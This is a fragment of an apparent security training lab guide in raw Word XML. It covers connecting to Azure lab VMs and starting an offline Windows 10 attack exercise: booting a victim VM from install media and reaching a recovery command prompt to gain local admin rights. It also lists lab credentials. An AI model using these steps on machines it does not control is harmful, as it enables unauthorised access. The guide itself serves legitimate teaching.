            <w:r w:rsidR="00D102E2">
              <w:t>l</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2070" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61B6B194" w14:textId="3DFB063B" w:rsidR="00F3552C" w:rsidRDefault="00F3552C" w:rsidP="0013017C">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Def&amp;Prot€ct</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>!</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1775" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38C763AA" w14:textId="16901EF3" w:rsidR="00F3552C" w:rsidRDefault="00F3552C" w:rsidP="0013017C">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Server Admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="791C8F96" w14:textId="77777777" w:rsidR="00BB44DD" w:rsidRPr="00A973CD" w:rsidRDefault="00BB44DD" w:rsidP="00A973CD">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7538E878" w14:textId="77777777" w:rsidR="0042651F" w:rsidRDefault="0042651F">
      <w:bookmarkStart w:id="17" w:name="_Toc492640586"/>
    </w:p>
    <w:p w14:paraId="524721C1" w14:textId="3ABE3B29" w:rsidR="0059717E" w:rsidRDefault="0059717E" w:rsidP="0059717E">
      <w:r>
        <w:t xml:space="preserve">Note that the machines </w:t>
      </w:r>
      <w:r w:rsidR="00E32ECE">
        <w:t xml:space="preserve">inside the hypervisor </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">have been provisioned in July 2018. </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Therefore, it is possible to see the following message while connecting for the first time to the servers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE6CECB" w14:textId="77777777" w:rsidR="0059717E" w:rsidRDefault="0059717E" w:rsidP="0059717E">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2066BD19" wp14:editId="20712E71">
            <wp:extent cx="4675367" cy="1115849"/>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33909BB0" w14:textId="77777777" w:rsidR="0042651F" w:rsidRDefault="0042651F">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9807E0" w14:textId="233B4346" w:rsidR="0059717E" w:rsidRDefault="0059717E" w:rsidP="0059717E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>In this case, click on View updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65731D2D" w14:textId="77777777" w:rsidR="0059717E" w:rsidRDefault="0059717E" w:rsidP="0059717E">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="310F6E08" wp14:editId="37FCFF99">
            <wp:extent cx="3220720" cy="2312958"/>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0C332A68" w14:textId="77777777" w:rsidR="0059717E" w:rsidRDefault="0059717E" w:rsidP="0059717E"/>
    <w:p w14:paraId="21EE9034" w14:textId="77777777" w:rsidR="0059717E" w:rsidRDefault="0059717E" w:rsidP="0059717E">
      <w:r>
        <w:t>We do not need the latest updates for these labs so you can close this window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581EEC1D" w14:textId="77777777" w:rsidR="0059717E" w:rsidRDefault="0059717E" w:rsidP="0059717E">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3554EA7B" w14:textId="77777777" w:rsidR="0059717E" w:rsidRDefault="0059717E" w:rsidP="0059717E">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc526181846"/>
      <w:bookmarkStart w:id="19" w:name="_Toc526182046"/>
      <w:bookmarkStart w:id="20" w:name="_Toc526233440"/>
      <w:bookmarkStart w:id="21" w:name="_Toc44075677"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>How to start and connect to a VM</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="20"/>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="15B43146" w14:textId="77777777" w:rsidR="0059717E" w:rsidRDefault="0059717E" w:rsidP="0059717E">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="Lienhypertexte"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Go to Azure portal : </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>https://portal.azure.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3CD313EF" w14:textId="77777777" w:rsidR="0059717E" w:rsidRDefault="0059717E" w:rsidP="0059717E">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Sign-in with your student or organizational account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B098EF" w14:textId="77777777" w:rsidR="0059717E" w:rsidRDefault="0059717E" w:rsidP="0059717E">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Click on the Dev&amp;Test Lab (Select the right subscription if the resource is not displayed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E7CBE2" w14:textId="77777777" w:rsidR="0059717E" w:rsidRDefault="0059717E" w:rsidP="0059717E">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FE6707D" wp14:editId="4676586E">
            <wp:extent cx="2369185" cy="2463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4C858CBF" w14:textId="77777777" w:rsidR="0059717E" w:rsidRDefault="0059717E" w:rsidP="0059717E">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To start a VM, click on “Claim </w:t>
      </w:r>
      <w:r w:rsidRPr="00800610">
        <w:t>machine</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7547BD" w14:textId="77777777" w:rsidR="0059717E" w:rsidRDefault="0059717E" w:rsidP="0059717E">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="452B58E4" wp14:editId="2AFDF002">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404DFB05" w14:textId="77777777" w:rsidR="0059717E" w:rsidRDefault="0059717E" w:rsidP="0059717E">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When the machine is started, it will be displayed in the “My Virtual Machines” pane. </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00800610">
        <w:t>After one minute, t</w:t>
      </w:r>
      <w:r>
        <w:t>he status will be Running. You can wait 30 seconds more before trying to connect on it.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA3D519" w14:textId="77777777" w:rsidR="0059717E" w:rsidRDefault="0059717E" w:rsidP="0059717E">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AED33A6" wp14:editId="28E3469D">
            <wp:extent cx="5510530" cy="6121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4A32D13C" w14:textId="77777777" w:rsidR="0059717E" w:rsidRDefault="0059717E" w:rsidP="0059717E">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A91CAA2" w14:textId="77777777" w:rsidR="0059717E" w:rsidRDefault="0059717E" w:rsidP="0059717E">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Select the running Virtual Machine and at the end of line, click on “…” then select Connect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6617688A" w14:textId="77777777" w:rsidR="0059717E" w:rsidRDefault="0059717E" w:rsidP="0059717E">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3218D0AC" wp14:editId="7D0A35F1">
            <wp:extent cx="5979160" cy="171767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2B125F1C" w14:textId="77777777" w:rsidR="0059717E" w:rsidRDefault="0059717E" w:rsidP="0059717E">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD77B00" w14:textId="77777777" w:rsidR="0059717E" w:rsidRDefault="0059717E" w:rsidP="0059717E">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>A warning is displayed about the publisher. You can ignore the warning and click on Connect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3796BA4B" w14:textId="77777777" w:rsidR="0059717E" w:rsidRDefault="0059717E" w:rsidP="0059717E">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BC44821" wp14:editId="040FCAEC">
            <wp:extent cx="3077210" cy="1630045"/>
            <wp:effectExtent l="0" t="0" r="889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2C759C80" w14:textId="77777777" w:rsidR="0059717E" w:rsidRDefault="0059717E" w:rsidP="0059717E">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enter the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>user name</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and password to connect to the Virtual Machine detailed in each exercise below. </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>(Do not use your student or organizational account.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37019864" w14:textId="77777777" w:rsidR="0059717E" w:rsidRDefault="0059717E" w:rsidP="0059717E">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53400F84" w14:textId="77777777" w:rsidR="0059717E" w:rsidRDefault="0059717E" w:rsidP="0059717E">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CE8644C" wp14:editId="2A5CAA07">
            <wp:extent cx="2568575" cy="209931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5BA016F7" w14:textId="77777777" w:rsidR="0059717E" w:rsidRDefault="0059717E" w:rsidP="0059717E">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="279DDDAB" w14:textId="77777777" w:rsidR="0059717E" w:rsidRDefault="0059717E" w:rsidP="0059717E">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E4DBE16" w14:textId="77777777" w:rsidR="0059717E" w:rsidRDefault="0059717E" w:rsidP="0059717E">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>A warning on the self-issued certificate is displayed. You can safely ignore this warning by clicking on Yes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37825172" w14:textId="77777777" w:rsidR="0059717E" w:rsidRDefault="0059717E" w:rsidP="0059717E">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FF3901B" wp14:editId="7DEC332C">
            <wp:extent cx="2536190" cy="26003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1D7B5B35" w14:textId="77777777" w:rsidR="0059717E" w:rsidRDefault="0059717E" w:rsidP="0059717E">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E849482" w14:textId="55E219F7" w:rsidR="007D17A0" w:rsidRPr="00F954C8" w:rsidRDefault="007D17A0" w:rsidP="006F2FCB">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc44075678"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Exercise </w:t>
      </w:r>
      <w:r w:rsidR="00C84DB1">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="003B0334">
        <w:t>Windows 10 offline attack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="7ED4740E" w14:textId="69324804" w:rsidR="00D43F61" w:rsidRPr="006C4FF0" w:rsidRDefault="00D43F61" w:rsidP="007D17A0">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Duration: 90 minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564A0043" w14:textId="66E20481" w:rsidR="007D17A0" w:rsidRPr="006C4FF0" w:rsidRDefault="00FC1DDD" w:rsidP="007D17A0">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C4FF0">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Synopsis: In this exercise, attendees will </w:t>
      </w:r>
      <w:r w:rsidR="003B0334" w:rsidRPr="006C4FF0">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>experience unprotected Windows 10 machine</w:t>
      </w:r>
      <w:r w:rsidRPr="006C4FF0">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0067178F" w:rsidRPr="006C4FF0">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> The purpose is to grant them local administrator privileges</w:t>
      </w:r>
      <w:r w:rsidR="00523147" w:rsidRPr="006C4FF0">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6258E4E2" w14:textId="056BF3CF" w:rsidR="007D17A0" w:rsidRDefault="007D17A0" w:rsidP="007D17A0">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc44075679"/>
      <w:r>
        <w:t xml:space="preserve">Task 1: </w:t>
      </w:r>
      <w:r w:rsidR="00C1204D">
        <w:t>Boot from media</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="4D6E732E" w14:textId="260F489F" w:rsidR="006C4FF0" w:rsidRPr="006C4FF0" w:rsidRDefault="006C4FF0" w:rsidP="00416A9B">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C4FF0">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>In this part attendees will use different technique</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="006C4FF0">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> to grant on machine local administrator privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E11DA11" w14:textId="65F718A0" w:rsidR="00903A5E" w:rsidRDefault="00A95047" w:rsidP="000C6667">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Connect on CYBERSEC-TD5</w:t>
      </w:r>
      <w:r w:rsidR="00903A5E">
        <w:t xml:space="preserve"> Hyper-V server and logon with account </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00903A5E" w:rsidRPr="000C6667">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>cyberadml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00903A5E">
        <w:t xml:space="preserve"> and password </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00903A5E" w:rsidRPr="000C6667">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Def&amp;Prot€ct</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00903A5E" w:rsidRPr="000C6667">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033E0347" w14:textId="07E2BA4F" w:rsidR="00903A5E" w:rsidRDefault="00903A5E" w:rsidP="000C6667">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Start Hyper-V console and edit VICTIM-PC settings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A2F421" w14:textId="42B19F40" w:rsidR="00903A5E" w:rsidRDefault="00903A5E" w:rsidP="00BA124E">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bind Windows 10 media (you can find on </w:t>
      </w:r>
      <w:r w:rsidR="00BA124E" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>C:\_ISO</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidR="003D6FCC" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>en_windows_10_business_editions_version_1803_updated_march_2018_x64_dvd_12063333.iso</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F751400" w14:textId="37DEF8C9" w:rsidR="003D6FCC" w:rsidRDefault="003D6FCC" w:rsidP="000C6667">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Change VM settings to allow boot on media:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEBCAEB" w14:textId="090C1697" w:rsidR="003D6FCC" w:rsidRDefault="003D6FCC" w:rsidP="003D6FCC">
      <w:r w:rsidRPr="003D6FCC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FCB4692" wp14:editId="245F0CDB">
            <wp:extent cx="3433788" cy="14716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788" cy="1471623"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0846BD8B" w14:textId="77777777" w:rsidR="00416A9B" w:rsidRDefault="00416A9B" w:rsidP="00416A9B"/>
    <w:p w14:paraId="5F86C9F1" w14:textId="4C43C75A" w:rsidR="003D6FCC" w:rsidRDefault="00903A5E" w:rsidP="000C6667">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Start VICTIME-PC on media</w:t>
      </w:r>
      <w:r w:rsidR="003D6FCC">
        <w:t xml:space="preserve"> and hit keyboard when this screen prompted:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EADCD20" w14:textId="5DC89B9B" w:rsidR="003D6FCC" w:rsidRDefault="008130DB" w:rsidP="003D6FCC">
      <w:r w:rsidRPr="008130DB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7406756D" wp14:editId="36D3DAEC">
            <wp:extent cx="2466993" cy="1762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93" cy="176214"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0084D431" w14:textId="77777777" w:rsidR="00416A9B" w:rsidRDefault="00416A9B" w:rsidP="00416A9B"/>
    <w:p w14:paraId="023F6A1F" w14:textId="29E3F824" w:rsidR="00903A5E" w:rsidRDefault="008130DB" w:rsidP="000C6667">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00754218">
        <w:t>hen select keyboard language</w:t>
      </w:r>
      <w:r w:rsidR="004E24E8">
        <w:t>, and click Next</w:t>
      </w:r>
      <w:r w:rsidR="00754218">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C46AD37" w14:textId="3508CD24" w:rsidR="00754218" w:rsidRDefault="004E24E8" w:rsidP="00754218">
      <w:r w:rsidRPr="004E24E8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DB2AD94" wp14:editId="60047776">
            <wp:extent cx="3946261"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4352" cy="2952441"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E294B2" w14:textId="77777777" w:rsidR="00416A9B" w:rsidRDefault="00416A9B" w:rsidP="00416A9B"/>
    <w:p w14:paraId="2E72B7C2" w14:textId="477350FE" w:rsidR="00903A5E" w:rsidRDefault="004E24E8" w:rsidP="000C6667">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Select “Repair your computer” option</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F817C13" w14:textId="4BFB1237" w:rsidR="004E24E8" w:rsidRDefault="004E24E8" w:rsidP="004E24E8">
      <w:r w:rsidRPr="004E24E8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79F6A078" wp14:editId="0577094B">
            <wp:extent cx="3937202" cy="29084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202" cy="2908449"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC00EC6" w14:textId="77777777" w:rsidR="00416A9B" w:rsidRDefault="00416A9B" w:rsidP="00416A9B"/>
    <w:p w14:paraId="63352F5B" w14:textId="527249AE" w:rsidR="00903A5E" w:rsidRDefault="004E24E8" w:rsidP="000C6667">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Select Troubleshooting option:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD76A33" w14:textId="011EA75E" w:rsidR="004E24E8" w:rsidRDefault="004E24E8" w:rsidP="004E24E8">
      <w:r w:rsidRPr="004E24E8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1007620C" wp14:editId="06490FE0">
            <wp:extent cx="4229317" cy="30227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317" cy="3022755"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="557E2DFE" w14:textId="77777777" w:rsidR="00416A9B" w:rsidRDefault="00416A9B" w:rsidP="00416A9B"/>
    <w:p w14:paraId="5C1902FC" w14:textId="3665930C" w:rsidR="004E24E8" w:rsidRDefault="004E24E8" w:rsidP="000C6667">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Select the</w:t>
      </w:r>
      <w:r w:rsidR="008130DB">
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Command Prompt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2586CD" w14:textId="44DCDAD3" w:rsidR="004B3805" w:rsidRDefault="004E24E8" w:rsidP="004B3805">
      <w:r w:rsidRPr="004E24E8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3990001B" wp14:editId="6460DB4E">
            <wp:extent cx="4762745" cy="2806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745" cy="2806844"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
